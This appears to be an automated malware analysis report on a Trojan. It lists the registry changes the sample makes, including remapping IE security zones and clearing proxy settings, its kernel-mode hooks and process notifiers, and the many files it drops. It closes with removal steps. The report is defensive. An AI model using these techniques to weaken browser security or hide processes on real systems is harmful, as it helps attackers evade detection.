"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CacheRepair" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CacheLimit" = "8192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CachePrefix" = ":2015070920150710:"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 55 44 AD B4 C5 76 E0 C3 2D 4E 20 1A 21 FE 52"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014040820140409]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\DRIVERS\rsndisp.sys", the Trojan monitors process creation and termination by installing a process notifier.
Using the driver "%System%\DRIVERS\kguard.sys", the Trojan monitors process creation and termination by installing a process notifier.
Using the driver "%System%\DRIVERS\rsndisp.sys", the Trojan monitors thread creation and termination by installing a thread notifier.
Using the driver "%System%\DRIVERS\rsndisp.sys", the Trojan monitors the loading of executable images into memory by installing a load-image notifier.
Using the driver "%System%\DRIVERS\sysmon.sys", the Trojan monitors operations on the system registry by installing a registry notifier.
The Trojan installs the following kernel-mode hooks:
KeUserModeCallback
ZwTerminateProcess
ZwAssignProcessToJobObject
ZwClose
ZwConnectPort
ZwCreateKey
ZwCreateMutant
ZwCreateProcess
ZwCreateProcessEx
ZwCreateSection
ZwCreateSymbolicLinkObject
ZwCreateThread
ZwDebugActiveProcess
ZwDuplicateObject
ZwEnumerateValueKey
ZwFreeVirtualMemory
ZwLoadDriver
ZwLockVirtualMemory
ZwOpenKey
ZwOpenProcess
ZwOpenSection
ZwProtectVirtualMemory
ZwQueryDirectoryFile
ZwQuerySystemInformation
ZwQueryValueKey
ZwQueueApcThread
ZwReadVirtualMemory
ZwRequestWaitReplyPort
ZwRestoreKey
ZwSecureConnectPort
ZwSetContextThread
ZwSetInformationProcess
ZwSetSecurityObject
ZwSetSystemInformation
ZwSetSystemTime
ZwSuspendProcess
ZwSuspendThread
ZwSystemDebugControl
ZwTerminateProcess
ZwTerminateThread
ZwUnmapViewOfSection
ZwWriteVirtualMemory
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate the malicious process(es) (How to End a Process With the Task Manager):
popwndexe.exe:592
install1403380.exe:1196
RsMgrSvc.exe:468
ravmond.exe:1328
ravmond.exe:1848
SinaInstall_567015.exe:604
SinaInstall_567015.exe:1296
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\DOCUMENTS AND SETTINGS (4 bytes)
%WinDir%\Temp\Perflib_Perfdata_7b8.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller (4 bytes)
%System%\wbem\Logs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jindutiao.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_03.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\delete.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\Temp\scs3.tmp (33880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check1.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_03.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_01.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\input_01.png (4 bytes)
%WinDir%\REGISTRATION (4 bytes)
C:\$Directory (1304 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\change.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_change02.png (4 bytes)
%System%\config (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\finish.png (12 bytes)
%System%\drivers (32 bytes)
%WinDir%\Temp\scs4.tmp (10145 bytes)
%Documents and Settings%\%current user%\Cookies (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check-box.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jieya_button.png (12 bytes)
%Documents and Settings%\%current user%\LOCAL SETTINGS (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\Opendownloadernewxml[1].htm (900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (1385 bytes)
%Program Files%\Rising\RAV\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\moncomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (278 bytes)
%Program Files%\Rising\RAV\setup.dat (601 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ShortCut\Repair.url (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RAV\12345678.000 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Program Files%\Rising\RAV\rav936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RAV\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Program Files%\Rising\RAV\msvcr90.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (605 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RAV\cfgxml\adefmon.mond (2 bytes)
%Program Files%\Rising\RAV\desktop.ini (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Program Files%\Rising\RAV\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (1604 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RAV\Label.dat (140 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsPcVer12.xml.rs (667 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (336 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RAV\RsTray.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RAV\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RAV\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RAV\cfgxml\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RAV\cfgxml\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsuser.db1 (601 bytes)
%Program Files%\Rising\RAV\XMLS\RSDK.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Program Files%\Rising\RAV\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RAV\cnt08.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%System%\drivers\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (435 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (1898 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (2613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RAV\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RAV\cfgxml\repairmanager.mond (207 bytes)
%Program Files%\Rising\RAV\CompsVer.inf (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RAV\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RAV\XMLS\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Program Files%\Rising\RAV\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RAV\mergexml.dll (601 bytes)
%Program Files%\Rising\RAV\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (2352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RAV\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RAV\rssrv.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Program Files%\Rising\RAV\XMLS\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\urg[1].htm (168 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Program Files%\Rising\RAV\cfgxml\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RAV\Cloudv3.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (935 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RAV\LogDc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (2550 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsmon.db (43 bytes)
%Program Files%\Rising\RAV\rscommx2.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RAV\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (1248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\urg[1].htm (56 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RAV\rscom.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RAV\XMLS\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RAV\cfgxml\userdata.rstray (293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (4295 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Program Files%\Rising\RAV\ravmond.exe (1425 bytes)
%Program Files%\Rising\RAV\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Program Files%\Rising\RAV\XMLS\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RAV\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RAV\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RAV\rsmain.exe (601 bytes)
%Program Files%\Rising\RAV\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Program Files%\Rising\RAV\XMLS\LICENSE.xml (347 bytes)
%Program Files%\Rising\RSD\Backup\RAV\Label.dat (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Program Files%\Rising\RAV\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (1076 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RAV\XMLS\RAVCONFIG.xml (518 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Program Files%\Rising\RAV\rsxml3w.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\RsPcVer12[1].xml (663 bytes)
%Program Files%\Rising\RAV\XMLS\MSCRT9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Program Files%\Rising\RAV\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Program Files%\Rising\RAV\rslog.dll (601 bytes)
%Program Files%\Rising\RAV\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\dfw.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (3891 bytes)
%Program Files%\Rising\RAV\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Program Files%\Rising\RAV\selfmon.dll (601 bytes)
